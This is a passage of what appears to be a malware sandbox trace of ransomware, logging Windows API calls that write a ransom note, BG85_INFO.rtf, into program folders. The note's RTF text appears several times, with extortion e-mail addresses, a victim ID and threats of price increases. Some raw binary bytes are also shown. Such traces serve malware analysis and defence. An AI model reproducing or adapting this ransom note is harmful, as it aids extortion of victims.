from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.269] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.270] CloseHandle (hObject=0x1cc) returned 1 [0066.270] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\bg85_info.rtf")) returned 0xffffffff [0066.271] GetLastError () returned 0x2 [0066.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w 